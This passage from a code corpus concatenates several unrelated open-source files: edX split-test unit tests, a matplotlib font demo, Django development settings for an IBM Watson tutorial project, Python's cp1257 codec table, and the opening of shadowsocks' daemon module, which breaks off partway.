        ['Group 0 Sees This Video', "Group 0 Sees This Problem"],
        ['Group 1 Sees This Video', 'Group 1 Sees This HTML'],
    ]
    HIDDEN_CONTENT = [
        ['Condition 0 vertical'],
        ['Condition 1 vertical'],
    ]
    # Data is html encoded, because it's inactive inside the
    # sequence until javascript is executed
    VISIBLE_CONTENT = [
        ['class="problems-wrapper'],
        ['Some HTML for group 1']
    ]

    def setUp(self):
        # We define problem components that we need but don't explicitly call elsewhere.
        # pylint: disable=unused-variable
        super(TestVertSplitTestVert, self).setUp()
        # Structure being built:
        # vert <- split_test
        # split_test cond 0 = vert <- {video, problem}
        # split_test cond 1 = vert <- {video, html}
        vert1 = ItemFactory.create(
            parent_location=self.sequential.location,
            category="vertical",
            display_name="Split test vertical",
        )
        # pylint: disable=protected-access
        c0_url = self.course.id.make_usage_key("vertical", "split_test_cond0")
        c1_url = self.course.id.make_usage_key("vertical", "split_test_cond1")
        # The split_test block maps each partition group to a child vertical.
        split_test = ItemFactory.create(
            parent_location=vert1.location,
            category="split_test",
            display_name="Split test",
            user_partition_id='0',
            group_id_to_child={"0": c0_url, "1": c1_url},
        )
        cond0vert = ItemFactory.create(
            parent_location=split_test.location,
            category="vertical",
            display_name="Condition 0 vertical",
            location=c0_url,
        )
        video0 = self._video(cond0vert, 0)
        problem0 = self._problem(cond0vert, 0)
        cond1vert = ItemFactory.create(
            parent_location=split_test.location,
            category="vertical",
            display_name="Condition 1 vertical",
            location=c1_url,
        )
        video1 = self._video(cond1vert, 1)
        html1 = self._html(cond1vert, 1)
class TestSplitTestVert(SplitTestBase):
    """
    Tests related to xmodule/split_test_module, with the split_test block
    directly under the sequential (no outer vertical).
    """
    __test__ = True

    COURSE_NUMBER = 'split-vert'

    ICON_CLASSES = [
        'seq_problem',
        'seq_video',
    ]
    TOOLTIPS = [
        ['Group 0 Sees This Video', "Group 0 Sees This Problem"],
        ['Group 1 Sees This Video', 'Group 1 Sees This HTML'],
    ]
    HIDDEN_CONTENT = [
        ['Condition 0 vertical'],
        ['Condition 1 vertical'],
    ]
    # Data is html encoded, because it's inactive inside the
    # sequence until javascript is executed
    VISIBLE_CONTENT = [
        ['class="problems-wrapper'],
        ['Some HTML for group 1']
    ]

    def setUp(self):
        # We define problem components that we need but don't explicitly call elsewhere.
        # pylint: disable=unused-variable
        super(TestSplitTestVert, self).setUp()
        # Structure being built:
        # split_test cond 0 = vert <- {video, problem}
        # split_test cond 1 = vert <- {video, html}
        # pylint: disable=protected-access
        c0_url = self.course.id.make_usage_key("vertical", "split_test_cond0")
        c1_url = self.course.id.make_usage_key("vertical", "split_test_cond1")
        # The split_test block maps each partition group to a child vertical.
        split_test = ItemFactory.create(
            parent_location=self.sequential.location,
            category="split_test",
            display_name="Split test",
            user_partition_id='0',
            group_id_to_child={"0": c0_url, "1": c1_url},
        )
        cond0vert = ItemFactory.create(
            parent_location=split_test.location,
            category="vertical",
            display_name="Condition 0 vertical",
            location=c0_url,
        )
        video0 = self._video(cond0vert, 0)
        problem0 = self._problem(cond0vert, 0)
        cond1vert = ItemFactory.create(
            parent_location=split_test.location,
            category="vertical",
            display_name="Condition 1 vertical",
            location=c1_url,
        )
        video1 = self._video(cond1vert, 1)
        html1 = self._html(cond1vert, 1)
@attr('shard_1')
class SplitTestPosition(ModuleStoreTestCase):
    """
    Check that we can change positions in a course with partitions defined
    """
    def setUp(self):
        super(SplitTestPosition, self).setUp()
        # Course with one two-group partition, plus an enrolled student.
        self.partition = UserPartition(
            0,
            'first_partition',
            'First Partition',
            [
                Group(0, 'alpha'),
                Group(1, 'beta')
            ]
        )
        self.course = CourseFactory.create(
            user_partitions=[self.partition]
        )
        self.chapter = ItemFactory.create(
            parent_location=self.course.location,
            category="chapter",
            display_name="test chapter",
        )
        self.student = UserFactory.create()
        CourseEnrollmentFactory.create(user=self.student, course_id=self.course.id)
        self.client.login(username=self.student.username, password='test')

    def test_changing_position_works(self):
        # Make a mock FieldDataCache for this course, so we can get the course module
        mock_field_data_cache = FieldDataCache([self.course], self.course.id, self.student)
        course = get_module_for_descriptor(
            self.student,
            MagicMock(name='request'),
            self.course,
            mock_field_data_cache,
            self.course.id,
            course=self.course
        )
        # Now that we have the course, change the position and save, nothing should explode!
        course.position = 2
        course.save()
| agpl-3.0 |
bundgus/python-playground | matplotlib-playground/examples/pylab_examples/fonts_demo_kw.py | 1 | 2105 | """
Same as fonts_demo using kwargs. If you prefer a more pythonic, OO
style of coding, see examples/fonts_demo.py.
"""
from matplotlib.font_manager import FontProperties
import matplotlib.pyplot as plt
import numpy as np
# One full-figure axes with a white background to host the text samples.
# NOTE(review): 'axisbg' is the pre-2.0 matplotlib spelling of 'facecolor'
# -- confirm the targeted matplotlib version.
plt.subplot(111, axisbg='w')

# Shared alignment kwargs reused by every plt.text call below.
alignment = {'horizontalalignment': 'center', 'verticalalignment': 'baseline'}

# Show family options
families = ['serif', 'sans-serif', 'cursive', 'fantasy', 'monospace']
t = plt.text(-0.8, 0.9, 'family', size='large', **alignment)

# Row y-positions shared by every column below (one option per row).
yp = [0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2]

for k, family in enumerate(families):
    t = plt.text(-0.8, yp[k], family, family=family, **alignment)

# Show style options
styles = ['normal', 'italic', 'oblique']
t = plt.text(-0.4, 0.9, 'style', **alignment)

for k, style in enumerate(styles):
    t = plt.text(-0.4, yp[k], style, family='sans-serif', style=style,
                 **alignment)

# Show variant options
variants = ['normal', 'small-caps']
t = plt.text(0.0, 0.9, 'variant', **alignment)

for k, variant in enumerate(variants):
    t = plt.text(0.0, yp[k], variant, family='serif', variant=variant,
                 **alignment)

# Show weight options
weights = ['light', 'normal', 'medium', 'semibold', 'bold', 'heavy', 'black']
t = plt.text(0.4, 0.9, 'weight', **alignment)

for k, weight in enumerate(weights):
    t = plt.text(0.4, yp[k], weight, weight=weight,
                 **alignment)

# Show size options
sizes = ['xx-small', 'x-small', 'small', 'medium', 'large',
         'x-large', 'xx-large']
t = plt.text(0.8, 0.9, 'size', **alignment)

for k, size in enumerate(sizes):
    t = plt.text(0.8, yp[k], size, size=size,
                 **alignment)

x = -0.4
# Show bold italic -- the same sample at three sizes.
t = plt.text(x, 0.1, 'bold italic', style='italic',
             weight='bold', size='x-small',
             **alignment)
t = plt.text(x, 0.2, 'bold italic',
             style='italic', weight='bold', size='medium',
             **alignment)
t = plt.text(x, 0.3, 'bold italic',
             style='italic', weight='bold', size='x-large',
             **alignment)

# Fixed data limits so the hand-placed text coordinates line up.
plt.axis([-1, 1, 0, 1])
plt.show()
| mit |
watson-developer-cloud/python-primer-companion-code | episode-4/django/src/projwatson/projwatson/settings.py | 6 | 4199 | # Copyright 2016 IBM Corp. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Django settings for projwatson project.
Generated by 'django-admin startproject' using Django 1.9.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '^igmjc3aaqr(+2j5=xi^wj07szp_3_qx!q1^c1w796zs3k019p'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'watsonlanguage',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'projwatson.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'projwatson.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'ourFormatter': {
'format': '%(asctime)s:%(name)s:%(levelname)s:%(message)s',
'datefmt': '%m/%d/%Y %I:%M:%S',
},
},
'handlers': {
'theConsole': {
'class': 'logging.StreamHandler',
'formatter': 'ourFormatter',
},
},
'root': {
'level': 'DEBUG',
'handlers': ['theConsole'],
},
}
| apache-2.0 |
4rado/RepositoryForProject | Lib/encodings/cp1257.py | 593 | 13630 | """ Python Character Mapping Codec cp1257 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1257.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
    """Stateless cp1257 codec; both directions delegate to the module-level
    charmap tables defined later in this generated file."""

    def encode(self, input, errors='strict'):
        return codecs.charmap_encode(input, errors, encoding_table)

    def decode(self, input, errors='strict'):
        return codecs.charmap_decode(input, errors, decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
    # Charmap encoding is stateless, so nothing is carried between calls;
    # only the encoded bytes ([0]) of the (bytes, length) pair are returned.
    def encode(self, input, final=False):
        return codecs.charmap_encode(input, self.errors, encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
    # Charmap decoding is stateless as well; return only the decoded text.
    def decode(self, input, final=False):
        return codecs.charmap_decode(input, self.errors, decoding_table)[0]
class StreamWriter(Codec, codecs.StreamWriter):
    # Behaviour is fully inherited: Codec supplies encode().
    pass
class StreamReader(Codec, codecs.StreamReader):
    # Behaviour is fully inherited: Codec supplies decode().
    pass
### encodings module API
def getregentry():
    """Return the CodecInfo record the :mod:`encodings` package uses to
    register the 'cp1257' codec."""
    return codecs.CodecInfo(
        name='cp1257',
        encode=Codec().encode,
        decode=Codec().decode,
        incrementalencoder=IncrementalEncoder,
        incrementaldecoder=IncrementalDecoder,
        streamreader=StreamReader,
        streamwriter=StreamWriter,
    )
### Decoding Table
decoding_table = (
    # One entry per byte value 0x00-0xFF, mapping it to its unicode
    # character; u'\ufffe' marks byte values with no cp1257 mapping.
    u'\x00'     #  0x00 -> NULL
    u'\x01'     #  0x01 -> START OF HEADING
    u'\x02'     #  0x02 -> START OF TEXT
    u'\x03'     #  0x03 -> END OF TEXT
    u'\x04'     #  0x04 -> END OF TRANSMISSION
    u'\x05'     #  0x05 -> ENQUIRY
    u'\x06'     #  0x06 -> ACKNOWLEDGE
    u'\x07'     #  0x07 -> BELL
    u'\x08'     #  0x08 -> BACKSPACE
    u'\t'       #  0x09 -> HORIZONTAL TABULATION
    u'\n'       #  0x0A -> LINE FEED
    u'\x0b'     #  0x0B -> VERTICAL TABULATION
    u'\x0c'     #  0x0C -> FORM FEED
    u'\r'       #  0x0D -> CARRIAGE RETURN
    u'\x0e'     #  0x0E -> SHIFT OUT
    u'\x0f'     #  0x0F -> SHIFT IN
    u'\x10'     #  0x10 -> DATA LINK ESCAPE
    u'\x11'     #  0x11 -> DEVICE CONTROL ONE
    u'\x12'     #  0x12 -> DEVICE CONTROL TWO
    u'\x13'     #  0x13 -> DEVICE CONTROL THREE
    u'\x14'     #  0x14 -> DEVICE CONTROL FOUR
    u'\x15'     #  0x15 -> NEGATIVE ACKNOWLEDGE
    u'\x16'     #  0x16 -> SYNCHRONOUS IDLE
    u'\x17'     #  0x17 -> END OF TRANSMISSION BLOCK
    u'\x18'     #  0x18 -> CANCEL
    u'\x19'     #  0x19 -> END OF MEDIUM
    u'\x1a'     #  0x1A -> SUBSTITUTE
    u'\x1b'     #  0x1B -> ESCAPE
    u'\x1c'     #  0x1C -> FILE SEPARATOR
    u'\x1d'     #  0x1D -> GROUP SEPARATOR
    u'\x1e'     #  0x1E -> RECORD SEPARATOR
    u'\x1f'     #  0x1F -> UNIT SEPARATOR
    u' '        #  0x20 -> SPACE
    u'!'        #  0x21 -> EXCLAMATION MARK
    u'"'        #  0x22 -> QUOTATION MARK
    u'#'        #  0x23 -> NUMBER SIGN
    u'$'        #  0x24 -> DOLLAR SIGN
    u'%'        #  0x25 -> PERCENT SIGN
    u'&'        #  0x26 -> AMPERSAND
    u"'"        #  0x27 -> APOSTROPHE
    u'('        #  0x28 -> LEFT PARENTHESIS
    u')'        #  0x29 -> RIGHT PARENTHESIS
    u'*'        #  0x2A -> ASTERISK
    u'+'        #  0x2B -> PLUS SIGN
    u','        #  0x2C -> COMMA
    u'-'        #  0x2D -> HYPHEN-MINUS
    u'.'        #  0x2E -> FULL STOP
    u'/'        #  0x2F -> SOLIDUS
    u'0'        #  0x30 -> DIGIT ZERO
    u'1'        #  0x31 -> DIGIT ONE
    u'2'        #  0x32 -> DIGIT TWO
    u'3'        #  0x33 -> DIGIT THREE
    u'4'        #  0x34 -> DIGIT FOUR
    u'5'        #  0x35 -> DIGIT FIVE
    u'6'        #  0x36 -> DIGIT SIX
    u'7'        #  0x37 -> DIGIT SEVEN
    u'8'        #  0x38 -> DIGIT EIGHT
    u'9'        #  0x39 -> DIGIT NINE
    u':'        #  0x3A -> COLON
    u';'        #  0x3B -> SEMICOLON
    u'<'        #  0x3C -> LESS-THAN SIGN
    u'='        #  0x3D -> EQUALS SIGN
    u'>'        #  0x3E -> GREATER-THAN SIGN
    u'?'        #  0x3F -> QUESTION MARK
    u'@'        #  0x40 -> COMMERCIAL AT
    u'A'        #  0x41 -> LATIN CAPITAL LETTER A
    u'B'        #  0x42 -> LATIN CAPITAL LETTER B
    u'C'        #  0x43 -> LATIN CAPITAL LETTER C
    u'D'        #  0x44 -> LATIN CAPITAL LETTER D
    u'E'        #  0x45 -> LATIN CAPITAL LETTER E
    u'F'        #  0x46 -> LATIN CAPITAL LETTER F
    u'G'        #  0x47 -> LATIN CAPITAL LETTER G
    u'H'        #  0x48 -> LATIN CAPITAL LETTER H
    u'I'        #  0x49 -> LATIN CAPITAL LETTER I
    u'J'        #  0x4A -> LATIN CAPITAL LETTER J
    u'K'        #  0x4B -> LATIN CAPITAL LETTER K
    u'L'        #  0x4C -> LATIN CAPITAL LETTER L
    u'M'        #  0x4D -> LATIN CAPITAL LETTER M
    u'N'        #  0x4E -> LATIN CAPITAL LETTER N
    u'O'        #  0x4F -> LATIN CAPITAL LETTER O
    u'P'        #  0x50 -> LATIN CAPITAL LETTER P
    u'Q'        #  0x51 -> LATIN CAPITAL LETTER Q
    u'R'        #  0x52 -> LATIN CAPITAL LETTER R
    u'S'        #  0x53 -> LATIN CAPITAL LETTER S
    u'T'        #  0x54 -> LATIN CAPITAL LETTER T
    u'U'        #  0x55 -> LATIN CAPITAL LETTER U
    u'V'        #  0x56 -> LATIN CAPITAL LETTER V
    u'W'        #  0x57 -> LATIN CAPITAL LETTER W
    u'X'        #  0x58 -> LATIN CAPITAL LETTER X
    u'Y'        #  0x59 -> LATIN CAPITAL LETTER Y
    u'Z'        #  0x5A -> LATIN CAPITAL LETTER Z
    u'['        #  0x5B -> LEFT SQUARE BRACKET
    u'\\'       #  0x5C -> REVERSE SOLIDUS
    u']'        #  0x5D -> RIGHT SQUARE BRACKET
    u'^'        #  0x5E -> CIRCUMFLEX ACCENT
    u'_'        #  0x5F -> LOW LINE
    u'`'        #  0x60 -> GRAVE ACCENT
    u'a'        #  0x61 -> LATIN SMALL LETTER A
    u'b'        #  0x62 -> LATIN SMALL LETTER B
    u'c'        #  0x63 -> LATIN SMALL LETTER C
    u'd'        #  0x64 -> LATIN SMALL LETTER D
    u'e'        #  0x65 -> LATIN SMALL LETTER E
    u'f'        #  0x66 -> LATIN SMALL LETTER F
    u'g'        #  0x67 -> LATIN SMALL LETTER G
    u'h'        #  0x68 -> LATIN SMALL LETTER H
    u'i'        #  0x69 -> LATIN SMALL LETTER I
    u'j'        #  0x6A -> LATIN SMALL LETTER J
    u'k'        #  0x6B -> LATIN SMALL LETTER K
    u'l'        #  0x6C -> LATIN SMALL LETTER L
    u'm'        #  0x6D -> LATIN SMALL LETTER M
    u'n'        #  0x6E -> LATIN SMALL LETTER N
    u'o'        #  0x6F -> LATIN SMALL LETTER O
    u'p'        #  0x70 -> LATIN SMALL LETTER P
    u'q'        #  0x71 -> LATIN SMALL LETTER Q
    u'r'        #  0x72 -> LATIN SMALL LETTER R
    u's'        #  0x73 -> LATIN SMALL LETTER S
    u't'        #  0x74 -> LATIN SMALL LETTER T
    u'u'        #  0x75 -> LATIN SMALL LETTER U
    u'v'        #  0x76 -> LATIN SMALL LETTER V
    u'w'        #  0x77 -> LATIN SMALL LETTER W
    u'x'        #  0x78 -> LATIN SMALL LETTER X
    u'y'        #  0x79 -> LATIN SMALL LETTER Y
    u'z'        #  0x7A -> LATIN SMALL LETTER Z
    u'{'        #  0x7B -> LEFT CURLY BRACKET
    u'|'        #  0x7C -> VERTICAL LINE
    u'}'        #  0x7D -> RIGHT CURLY BRACKET
    u'~'        #  0x7E -> TILDE
    u'\x7f'     #  0x7F -> DELETE
    u'\u20ac'   #  0x80 -> EURO SIGN
    u'\ufffe'   #  0x81 -> UNDEFINED
    u'\u201a'   #  0x82 -> SINGLE LOW-9 QUOTATION MARK
    u'\ufffe'   #  0x83 -> UNDEFINED
    u'\u201e'   #  0x84 -> DOUBLE LOW-9 QUOTATION MARK
    u'\u2026'   #  0x85 -> HORIZONTAL ELLIPSIS
    u'\u2020'   #  0x86 -> DAGGER
    u'\u2021'   #  0x87 -> DOUBLE DAGGER
    u'\ufffe'   #  0x88 -> UNDEFINED
    u'\u2030'   #  0x89 -> PER MILLE SIGN
    u'\ufffe'   #  0x8A -> UNDEFINED
    u'\u2039'   #  0x8B -> SINGLE LEFT-POINTING ANGLE QUOTATION MARK
    u'\ufffe'   #  0x8C -> UNDEFINED
    u'\xa8'     #  0x8D -> DIAERESIS
    u'\u02c7'   #  0x8E -> CARON
    u'\xb8'     #  0x8F -> CEDILLA
    u'\ufffe'   #  0x90 -> UNDEFINED
    u'\u2018'   #  0x91 -> LEFT SINGLE QUOTATION MARK
    u'\u2019'   #  0x92 -> RIGHT SINGLE QUOTATION MARK
    u'\u201c'   #  0x93 -> LEFT DOUBLE QUOTATION MARK
    u'\u201d'   #  0x94 -> RIGHT DOUBLE QUOTATION MARK
    u'\u2022'   #  0x95 -> BULLET
    u'\u2013'   #  0x96 -> EN DASH
    u'\u2014'   #  0x97 -> EM DASH
    u'\ufffe'   #  0x98 -> UNDEFINED
    u'\u2122'   #  0x99 -> TRADE MARK SIGN
    u'\ufffe'   #  0x9A -> UNDEFINED
    u'\u203a'   #  0x9B -> SINGLE RIGHT-POINTING ANGLE QUOTATION MARK
    u'\ufffe'   #  0x9C -> UNDEFINED
    u'\xaf'     #  0x9D -> MACRON
    u'\u02db'   #  0x9E -> OGONEK
    u'\ufffe'   #  0x9F -> UNDEFINED
    u'\xa0'     #  0xA0 -> NO-BREAK SPACE
    u'\ufffe'   #  0xA1 -> UNDEFINED
    u'\xa2'     #  0xA2 -> CENT SIGN
    u'\xa3'     #  0xA3 -> POUND SIGN
    u'\xa4'     #  0xA4 -> CURRENCY SIGN
    u'\ufffe'   #  0xA5 -> UNDEFINED
    u'\xa6'     #  0xA6 -> BROKEN BAR
    u'\xa7'     #  0xA7 -> SECTION SIGN
    u'\xd8'     #  0xA8 -> LATIN CAPITAL LETTER O WITH STROKE
    u'\xa9'     #  0xA9 -> COPYRIGHT SIGN
    u'\u0156'   #  0xAA -> LATIN CAPITAL LETTER R WITH CEDILLA
    u'\xab'     #  0xAB -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
    u'\xac'     #  0xAC -> NOT SIGN
    u'\xad'     #  0xAD -> SOFT HYPHEN
    u'\xae'     #  0xAE -> REGISTERED SIGN
    u'\xc6'     #  0xAF -> LATIN CAPITAL LETTER AE
    u'\xb0'     #  0xB0 -> DEGREE SIGN
    u'\xb1'     #  0xB1 -> PLUS-MINUS SIGN
    u'\xb2'     #  0xB2 -> SUPERSCRIPT TWO
    u'\xb3'     #  0xB3 -> SUPERSCRIPT THREE
    u'\xb4'     #  0xB4 -> ACUTE ACCENT
    u'\xb5'     #  0xB5 -> MICRO SIGN
    u'\xb6'     #  0xB6 -> PILCROW SIGN
    u'\xb7'     #  0xB7 -> MIDDLE DOT
    u'\xf8'     #  0xB8 -> LATIN SMALL LETTER O WITH STROKE
    u'\xb9'     #  0xB9 -> SUPERSCRIPT ONE
    u'\u0157'   #  0xBA -> LATIN SMALL LETTER R WITH CEDILLA
    u'\xbb'     #  0xBB -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
    u'\xbc'     #  0xBC -> VULGAR FRACTION ONE QUARTER
    u'\xbd'     #  0xBD -> VULGAR FRACTION ONE HALF
    u'\xbe'     #  0xBE -> VULGAR FRACTION THREE QUARTERS
    u'\xe6'     #  0xBF -> LATIN SMALL LETTER AE
    u'\u0104'   #  0xC0 -> LATIN CAPITAL LETTER A WITH OGONEK
    u'\u012e'   #  0xC1 -> LATIN CAPITAL LETTER I WITH OGONEK
    u'\u0100'   #  0xC2 -> LATIN CAPITAL LETTER A WITH MACRON
    u'\u0106'   #  0xC3 -> LATIN CAPITAL LETTER C WITH ACUTE
    u'\xc4'     #  0xC4 -> LATIN CAPITAL LETTER A WITH DIAERESIS
    u'\xc5'     #  0xC5 -> LATIN CAPITAL LETTER A WITH RING ABOVE
    u'\u0118'   #  0xC6 -> LATIN CAPITAL LETTER E WITH OGONEK
    u'\u0112'   #  0xC7 -> LATIN CAPITAL LETTER E WITH MACRON
    u'\u010c'   #  0xC8 -> LATIN CAPITAL LETTER C WITH CARON
    u'\xc9'     #  0xC9 -> LATIN CAPITAL LETTER E WITH ACUTE
    u'\u0179'   #  0xCA -> LATIN CAPITAL LETTER Z WITH ACUTE
    u'\u0116'   #  0xCB -> LATIN CAPITAL LETTER E WITH DOT ABOVE
    u'\u0122'   #  0xCC -> LATIN CAPITAL LETTER G WITH CEDILLA
    u'\u0136'   #  0xCD -> LATIN CAPITAL LETTER K WITH CEDILLA
    u'\u012a'   #  0xCE -> LATIN CAPITAL LETTER I WITH MACRON
    u'\u013b'   #  0xCF -> LATIN CAPITAL LETTER L WITH CEDILLA
    u'\u0160'   #  0xD0 -> LATIN CAPITAL LETTER S WITH CARON
    u'\u0143'   #  0xD1 -> LATIN CAPITAL LETTER N WITH ACUTE
    u'\u0145'   #  0xD2 -> LATIN CAPITAL LETTER N WITH CEDILLA
    u'\xd3'     #  0xD3 -> LATIN CAPITAL LETTER O WITH ACUTE
    u'\u014c'   #  0xD4 -> LATIN CAPITAL LETTER O WITH MACRON
    u'\xd5'     #  0xD5 -> LATIN CAPITAL LETTER O WITH TILDE
    u'\xd6'     #  0xD6 -> LATIN CAPITAL LETTER O WITH DIAERESIS
    u'\xd7'     #  0xD7 -> MULTIPLICATION SIGN
    u'\u0172'   #  0xD8 -> LATIN CAPITAL LETTER U WITH OGONEK
    u'\u0141'   #  0xD9 -> LATIN CAPITAL LETTER L WITH STROKE
    u'\u015a'   #  0xDA -> LATIN CAPITAL LETTER S WITH ACUTE
    u'\u016a'   #  0xDB -> LATIN CAPITAL LETTER U WITH MACRON
    u'\xdc'     #  0xDC -> LATIN CAPITAL LETTER U WITH DIAERESIS
    u'\u017b'   #  0xDD -> LATIN CAPITAL LETTER Z WITH DOT ABOVE
    u'\u017d'   #  0xDE -> LATIN CAPITAL LETTER Z WITH CARON
    u'\xdf'     #  0xDF -> LATIN SMALL LETTER SHARP S
    u'\u0105'   #  0xE0 -> LATIN SMALL LETTER A WITH OGONEK
    u'\u012f'   #  0xE1 -> LATIN SMALL LETTER I WITH OGONEK
    u'\u0101'   #  0xE2 -> LATIN SMALL LETTER A WITH MACRON
    u'\u0107'   #  0xE3 -> LATIN SMALL LETTER C WITH ACUTE
    u'\xe4'     #  0xE4 -> LATIN SMALL LETTER A WITH DIAERESIS
    u'\xe5'     #  0xE5 -> LATIN SMALL LETTER A WITH RING ABOVE
    u'\u0119'   #  0xE6 -> LATIN SMALL LETTER E WITH OGONEK
    u'\u0113'   #  0xE7 -> LATIN SMALL LETTER E WITH MACRON
    u'\u010d'   #  0xE8 -> LATIN SMALL LETTER C WITH CARON
    u'\xe9'     #  0xE9 -> LATIN SMALL LETTER E WITH ACUTE
    u'\u017a'   #  0xEA -> LATIN SMALL LETTER Z WITH ACUTE
    u'\u0117'   #  0xEB -> LATIN SMALL LETTER E WITH DOT ABOVE
    u'\u0123'   #  0xEC -> LATIN SMALL LETTER G WITH CEDILLA
    u'\u0137'   #  0xED -> LATIN SMALL LETTER K WITH CEDILLA
    u'\u012b'   #  0xEE -> LATIN SMALL LETTER I WITH MACRON
    u'\u013c'   #  0xEF -> LATIN SMALL LETTER L WITH CEDILLA
    u'\u0161'   #  0xF0 -> LATIN SMALL LETTER S WITH CARON
    u'\u0144'   #  0xF1 -> LATIN SMALL LETTER N WITH ACUTE
    u'\u0146'   #  0xF2 -> LATIN SMALL LETTER N WITH CEDILLA
    u'\xf3'     #  0xF3 -> LATIN SMALL LETTER O WITH ACUTE
    u'\u014d'   #  0xF4 -> LATIN SMALL LETTER O WITH MACRON
    u'\xf5'     #  0xF5 -> LATIN SMALL LETTER O WITH TILDE
    u'\xf6'     #  0xF6 -> LATIN SMALL LETTER O WITH DIAERESIS
    u'\xf7'     #  0xF7 -> DIVISION SIGN
    u'\u0173'   #  0xF8 -> LATIN SMALL LETTER U WITH OGONEK
    u'\u0142'   #  0xF9 -> LATIN SMALL LETTER L WITH STROKE
    u'\u015b'   #  0xFA -> LATIN SMALL LETTER S WITH ACUTE
    u'\u016b'   #  0xFB -> LATIN SMALL LETTER U WITH MACRON
    u'\xfc'     #  0xFC -> LATIN SMALL LETTER U WITH DIAERESIS
    u'\u017c'   #  0xFD -> LATIN SMALL LETTER Z WITH DOT ABOVE
    u'\u017e'   #  0xFE -> LATIN SMALL LETTER Z WITH CARON
    u'\u02d9'   #  0xFF -> DOT ABOVE
)
### Encoding table
# Inverse mapping (unicode ordinal -> byte value) derived from decoding_table.
encoding_table=codecs.charmap_build(decoding_table)
| gpl-3.0 |
icetoggle/shadowsocks | shadowsocks/daemon.py | 694 | 5602 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import os
import sys
import logging
import signal
import time
from shadowsocks import common, shell
# this module is ported from ShadowVPN daemon.c
def daemon_exec(config):
    """Dispatch the daemon sub-command found in *config*.

    Recognized commands are 'start', 'stop' and 'restart' (an empty value
    defaults to 'start').  A config without a 'daemon' key is a no-op.
    Raises on non-POSIX platforms or on an unknown command; 'stop' never
    returns (the process exits).
    """
    if 'daemon' not in config:
        return
    if os.name != 'posix':
        raise Exception('daemon mode is only supported on Unix')
    command = config['daemon'] or 'start'
    pid_file = config['pid-file']
    log_file = config['log-file']
    if command == 'start':
        daemon_start(pid_file, log_file)
    elif command == 'stop':
        daemon_stop(pid_file)
        # always exit after daemon_stop
        sys.exit(0)
    elif command == 'restart':
        daemon_stop(pid_file)
        daemon_start(pid_file, log_file)
    else:
        raise Exception('unsupported daemon command %s' % command)
def write_pid_file(pid_file, pid):
    """Record *pid* in *pid_file* and take an exclusive lock on it.

    Returns 0 on success, -1 if the file cannot be opened or is already
    locked by a running instance.  The descriptor is deliberately left
    open so the lock is held for the lifetime of the process.
    """
    import fcntl
    import stat
    try:
        fd = os.open(pid_file, os.O_RDWR | os.O_CREAT,
                     stat.S_IRUSR | stat.S_IWUSR)
    except OSError as e:
        shell.print_exception(e)
        return -1
    # Mark the descriptor close-on-exec so exec'd children do not inherit
